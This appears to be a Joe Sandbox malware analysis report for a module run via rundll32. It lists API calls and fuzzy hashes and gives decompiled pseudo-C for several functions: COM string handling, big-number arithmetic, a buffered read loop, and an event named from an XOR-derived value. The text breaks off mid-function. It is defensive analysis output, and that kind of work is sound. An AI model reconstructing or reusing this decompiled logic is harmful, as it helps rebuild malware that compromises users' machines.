                                                  0x04f41974
                                                  0x04f419ce
                                                  0x04f419da
                                                  0x04f419d0
                                                  0x04f419d3
                                                  0x04f419d3
                                                  0x04f419ce
                                                  0x04f41945
                                                  0x00000000
                                                  0x04f4190c
                                                  0x04f418b4
                                                  0x04f418be
                                                  0x04f418c0
                                                  0x04f418c5
                                                  0x04f418c9
                                                  0x04f418cb
                                                  0x04f418d6
                                                  0x04f418d9
                                                  0x04f418d9
                                                  0x04f418df
                                                  0x04f418e4
                                                  0x04f418e4
                                                  0x04f418ea
                                                  0x00000000
                                                  0x04f418ea
                                                  0x04f417ef
                                                  0x00000000
                                                  0x04f41816
                                                  0x04f41816
                                                  0x04f41822
                                                  0x04f41835
                                                  0x04f4183b
                                                  0x04f41843
                                                  0x00000000
                                                  0x04f41843

                                                  APIs
                                                  • StrChrA.SHLWAPI(04F43C81,0000005F,00000000,00000000,00000104), ref: 04F41808
                                                  • lstrcpy.KERNEL32(?,?), ref: 04F41835
                                                    • Part of subcall function 04F4809F: lstrlen.KERNEL32(?,00000000,04F4D330,00000001,04F42200,04F4D00C,04F4D00C,00000000,00000005,00000000,00000000,?,?,?,04F496C1,04F423E9), ref: 04F480A8
                                                    • Part of subcall function 04F4809F: mbstowcs.NTDLL ref: 04F480CF
                                                    • Part of subcall function 04F4809F: memset.NTDLL ref: 04F480E1
                                                    • Part of subcall function 04F42659: lstrlenW.KERNEL32(04F43C81,?,?,04F419A9,3D04F4C0,80000002,04F43C81,04F48B1E,74666F53,4D4C4B48,04F48B1E,?,3D04F4C0,80000002,04F43C81,?), ref: 04F42679
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 04F41857
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  • Opcode ID: c6ab69a21bb928d5e6b49b4aa54dab6565b20334bfe389ad07000d70eaf9c192
                                                  • Instruction ID: 6414a564a877bb97451b7de80584bd7381c09f14d047ada10a121e47ef15ed18
                                                  • Opcode Fuzzy Hash: c6ab69a21bb928d5e6b49b4aa54dab6565b20334bfe389ad07000d70eaf9c192
                                                  • Instruction Fuzzy Hash: C7515E7660020DFFEF21AFA4DE44EAA3BBAEF88354F008515FA1592150EF35E956DB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F452F9, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E04F452F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x4f4d27c; // 0x212a5a8
					_t5 = _t102 + 0x4f4e038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x4f4c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x4f4d27c; // 0x212a5a8
												_t28 = _t108 + 0x4f4e0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x4f4d27c; // 0x212a5a8
														_t33 = _t78 + 0x4f4e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                  0x04f452fe
                                                  0x04f45307
                                                  0x04f45308
                                                  0x04f4530c
                                                  0x04f45312
                                                  0x04f45318
                                                  0x04f45321
                                                  0x04f45327
                                                  0x04f45331
                                                  0x04f45333
                                                  0x04f45339
                                                  0x04f4533e
                                                  0x04f45349
                                                  0x04f45351
                                                  0x04f45354
                                                  0x04f45477
                                                  0x04f4535a
                                                  0x04f4535a
                                                  0x04f45367
                                                  0x04f4536d
                                                  0x04f45373
                                                  0x04f45377
                                                  0x04f4537d
                                                  0x04f4538a
                                                  0x04f4538e
                                                  0x04f45394
                                                  0x04f45397
                                                  0x04f4539d
                                                  0x04f453a3
                                                  0x04f453a9
                                                  0x04f453ac
                                                  0x04f453af
                                                  0x04f453b5
                                                  0x04f453be
                                                  0x04f453c4
                                                  0x04f453c5
                                                  0x04f453c8
                                                  0x04f453c9
                                                  0x04f453ca
                                                  0x04f453d2
                                                  0x04f453d3
                                                  0x04f453d4
                                                  0x04f453d6
                                                  0x04f453da
                                                  0x04f453de
                                                  0x00000000
                                                  0x00000000
                                                  0x04f453e4
                                                  0x04f453ed
                                                  0x04f453f3
                                                  0x04f453fd
                                                  0x04f45401
                                                  0x04f45403
                                                  0x04f45410
                                                  0x04f45414
                                                  0x04f4541c
                                                  0x04f45421
                                                  0x04f45433
                                                  0x04f45435
                                                  0x04f4543b
                                                  0x04f4543b
                                                  0x04f45444
                                                  0x04f45444
                                                  0x04f45446
                                                  0x04f4544c
                                                  0x04f4544c
                                                  0x04f4544f
                                                  0x04f45455
                                                  0x04f45458
                                                  0x04f45461
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f45461
                                                  0x04f453b5
                                                  0x04f453af
                                                  0x04f45397
                                                  0x04f45467
                                                  0x04f45467
                                                  0x04f4546d
                                                  0x04f4546d
                                                  0x04f45473
                                                  0x04f45473
                                                  0x04f4547c
                                                  0x04f45482
                                                  0x04f45482
                                                  0x04f4533e
                                                  0x04f4548b

                                                  APIs
                                                  • SysAllocString.OLEAUT32(04F4C2B0), ref: 04F45349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04F4542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F45444
                                                  • SysFreeString.OLEAUT32(?), ref: 04F45473
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: aa2e12770ff26bfd9b0dc974c7581d9dde0ec78f13ff88a189b864b43e9fa410
                                                  • Instruction ID: d048eeaca09e2047406b717bd8182b072c85c4518d0701503f4a4de1ba6e7888
                                                  • Opcode Fuzzy Hash: aa2e12770ff26bfd9b0dc974c7581d9dde0ec78f13ff88a189b864b43e9fa410
                                                  • Instruction Fuzzy Hash: 9F515175D00519EFCB00DFA8C8989AEB7B9EFC9705B144584E915EB320DB31AD42CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4163F, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 04F41680
                                                  • SysFreeString.OLEAUT32(?), ref: 04F41763
                                                    • Part of subcall function 04F452F9: SysAllocString.OLEAUT32(04F4C2B0), ref: 04F45349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 04F417B7
                                                  • SysFreeString.OLEAUT32(?), ref: 04F417C5
                                                    • Part of subcall function 04F42436: Sleep.KERNEL32(000001F4), ref: 04F4247E
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                  • String ID:
                                                  • API String ID: 3193056040-0
                                                  • Opcode ID: a8e276a71b86b21a0b6371096551d3f1a0ec51af6da33ca9b2dfd68b99dd7b63
                                                  • Instruction ID: 110094c261507235232dd1a2aaa7c05fe53e3e2689844260d3352969559785e6
                                                  • Opcode Fuzzy Hash: a8e276a71b86b21a0b6371096551d3f1a0ec51af6da33ca9b2dfd68b99dd7b63
                                                  • Instruction Fuzzy Hash: 00515776900209EFDB10DFE8C98889EBBB6FFC8350B158969E515DB210DB35AD46CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F41017, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E04F41017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04F4A7AA(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04F4968F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04F48967(_t101,  &_v236, _a8, _t96 - _t81);
					E04F48967(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E04F4968F(_t101, 0x4f4d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04F4968F(_a16, _a4);
						E04F41D6C(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04F4B0C8();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04F4B0C2();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04F41FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E04F48B62(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04F49100(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4f4d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                  0x04f4101a
                                                  0x04f41026
                                                  0x04f4102c
                                                  0x04f41031
                                                  0x04f41035
                                                  0x04f41192
                                                  0x04f41196
                                                  0x04f41196
                                                  0x04f4103b
                                                  0x04f4103f
                                                  0x04f41045
                                                  0x04f41046
                                                  0x04f41051
                                                  0x04f41057
                                                  0x04f4105c
                                                  0x04f4105f
                                                  0x04f41079
                                                  0x04f41085
                                                  0x04f4108e
                                                  0x04f41098
                                                  0x04f4109d
                                                  0x04f4109f
                                                  0x04f410a2
                                                  0x04f41150
                                                  0x04f41156
                                                  0x04f41167
                                                  0x04f4117a
                                                  0x04f4118a
                                                  0x00000000
                                                  0x04f4118f
                                                  0x04f410ab
                                                  0x04f410b2
                                                  0x04f410b6
                                                  0x04f410bc
                                                  0x04f410be
                                                  0x04f410c0
                                                  0x04f410c2
                                                  0x04f410c4
                                                  0x04f410ce
                                                  0x04f410d3
                                                  0x04f410d5
                                                  0x04f410d7
                                                  0x04f410d8
                                                  0x04f410d9
                                                  0x04f410da
                                                  0x04f410e1
                                                  0x04f410e8
                                                  0x04f410eb
                                                  0x04f410eb
                                                  0x04f410b8
                                                  0x04f410b8
                                                  0x04f410b8
                                                  0x04f410f3
                                                  0x04f410fb
                                                  0x04f41104
                                                  0x04f41109
                                                  0x04f41109
                                                  0x04f4110e
                                                  0x00000000
                                                  0x00000000
                                                  0x04f41110
                                                  0x04f41113
                                                  0x04f4111d
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4111f
                                                  0x04f4111f
                                                  0x04f41129
                                                  0x04f41109
                                                  0x04f4110e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4110e
                                                  0x04f41133
                                                  0x04f41136
                                                  0x04f41139
                                                  0x04f41140
                                                  0x04f41140
                                                  0x04f4114d
                                                  0x00000000
                                                  0x04f4114d
                                                  0x04f41048
                                                  0x04f4104c
                                                  0x04f4104d
                                                  0x04f4104f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4104f
                                                  0x00000000

                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04F410C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04F410DA
                                                  • memset.NTDLL ref: 04F4117A
                                                  • memset.NTDLL ref: 04F4118A
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: 94a40be5b50b8c99547e5a4e16a8e4f535a471b4b7a859c26416d9698e84bbde
                                                  • Instruction ID: 4882c9de3e6c7978ae6246018997713dd941d4c6800e0c039dd73d056d0c7752
                                                  • Opcode Fuzzy Hash: 94a40be5b50b8c99547e5a4e16a8e4f535a471b4b7a859c26416d9698e84bbde
                                                  • Instruction Fuzzy Hash: C341A471A00259ABEB10DFA8DD44BEE7F78EFC4314F008529E915A7280DF70B9868B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4A9AB, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 04F4A9BD
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • ResetEvent.KERNEL32(?), ref: 04F4AA31
                                                  • GetLastError.KERNEL32 ref: 04F4AA54
                                                  • GetLastError.KERNEL32 ref: 04F4AAFF
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 135f95c28f4512b96bd2ee8082a5e9e771ff890cc8b7723bddfe728a51c8079b
                                                  • Instruction ID: 703c0161c5d927aed2d32e78b8cde1c94f55af09b3c1660668bb904b782121e5
                                                  • Opcode Fuzzy Hash: 135f95c28f4512b96bd2ee8082a5e9e771ff890cc8b7723bddfe728a51c8079b
                                                  • Instruction Fuzzy Hash: 3A418D75A40248BBE7309FB5DC48EAB7EBDEBD5704B004929F552E1090EF75A986CA20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F439BF, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E04F439BF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x4f4d134() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x4f4d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E04F42049(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x4f4d134() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E04F49039(_v16);
							if(_t58 == 0) {
								_t58 = E04F47A07(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E04F41C47( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E04F41C47( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                                  0x04f439bf
                                                  0x04f439ce
                                                  0x04f439d3
                                                  0x04f439d5
                                                  0x04f439da
                                                  0x04f439db
                                                  0x04f439e0
                                                  0x04f439e1
                                                  0x04f439ec
                                                  0x04f43a1d
                                                  0x04f43a22
                                                  0x04f43ae5
                                                  0x04f43ae8
                                                  0x04f43aee
                                                  0x04f43aee
                                                  0x04f43a2f
                                                  0x04f43a37
                                                  0x04f43ae2
                                                  0x00000000
                                                  0x04f43ae2
                                                  0x04f43a42
                                                  0x04f43a49
                                                  0x04f43a4c
                                                  0x04f43ad4
                                                  0x04f43ad5
                                                  0x04f43ad5
                                                  0x04f43adb
                                                  0x00000000
                                                  0x04f43adb
                                                  0x04f43a52
                                                  0x04f43a54
                                                  0x04f43a5a
                                                  0x04f43a5b
                                                  0x04f43a5b
                                                  0x04f43a5e
                                                  0x04f43a61
                                                  0x04f43a67
                                                  0x04f43a6c
                                                  0x04f43a6d
                                                  0x04f43a72
                                                  0x04f43a75
                                                  0x04f43a80
                                                  0x00000000
                                                  0x00000000
                                                  0x04f43a88
                                                  0x04f43a90
                                                  0x04f43ab9
                                                  0x04f43abc
                                                  0x04f43ac3
                                                  0x04f43ace
                                                  0x04f43ace
                                                  0x00000000
                                                  0x04f43ac3
                                                  0x04f43a9c
                                                  0x04f43aa0
                                                  0x00000000
                                                  0x00000000
                                                  0x04f43aa2
                                                  0x04f43aa7
                                                  0x00000000
                                                  0x00000000
                                                  0x04f43aa9
                                                  0x04f43aa9
                                                  0x04f43aae
                                                  0x00000000
                                                  0x00000000
                                                  0x04f43ab0
                                                  0x04f43ab1
                                                  0x04f43ab4
                                                  0x04f43ab4
                                                  0x04f43a5b
                                                  0x04f439f4
                                                  0x04f439fc
                                                  0x04f43a15
                                                  0x04f43a17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f43a17
                                                  0x04f43a08
                                                  0x04f43a0c
                                                  0x00000000
                                                  0x00000000
                                                  0x04f43a12
                                                  0x00000000

                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 04F439D5
                                                  • GetLastError.KERNEL32 ref: 04F439EE
                                                    • Part of subcall function 04F41C47: WaitForMultipleObjects.KERNEL32(00000002,04F4AA72,00000000,04F4AA72,?,?,?,04F4AA72,0000EA60), ref: 04F41C62
                                                  • ResetEvent.KERNEL32(?), ref: 04F43A67
                                                  • GetLastError.KERNEL32 ref: 04F43A82
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: 05fb485a78d75f869a195726d770625b7c3f989e94086358ba7fb504d257966a
                                                  • Instruction ID: 6aa41f1cefe55068ebcf4dc41e71c94fd5b9b4cc4398611f85f3e23b2a8b3052
                                                  • Opcode Fuzzy Hash: 05fb485a78d75f869a195726d770625b7c3f989e94086358ba7fb504d257966a
                                                  • Instruction Fuzzy Hash: 7431B13AB80204ABDB21DFA4DC44A6E7BB9EFC4264F100568E915E71D0EF30F946CB12
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F43AEF, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 04F43B46
                                                  • SysAllocString.OLEAUT32(04F41885), ref: 04F43B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F43B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F43BAB
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 734a622780ed0e5d91aec4c9eb6d43fceaf2acad3f7d92d1296e1e1dfdcd3ea8
                                                  • Instruction ID: 96dac214cfa988d4bfb6d641436073c6680bb7ee4284e29e9c6a845e84287fbe
                                                  • Opcode Fuzzy Hash: 734a622780ed0e5d91aec4c9eb6d43fceaf2acad3f7d92d1296e1e1dfdcd3ea8
                                                  • Instruction Fuzzy Hash: D131F075A00109EFCB05DF98D4C49AE7FB5FF98340B10846DF91AA7210DB75AA46CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F442EA, Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E04F442EA(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x4f4d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4f4d27c; // 0x212a5a8
				_t3 = _t8 + 0x4f4e862; // 0x61636f4c
				_t25 = 0;
				_t30 = E04F47A9A(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4f4d2a8, 1, 0, _t30);
					E04F49039(_t30);
				}
				_t12 =  *0x4f4d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04F4757F() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
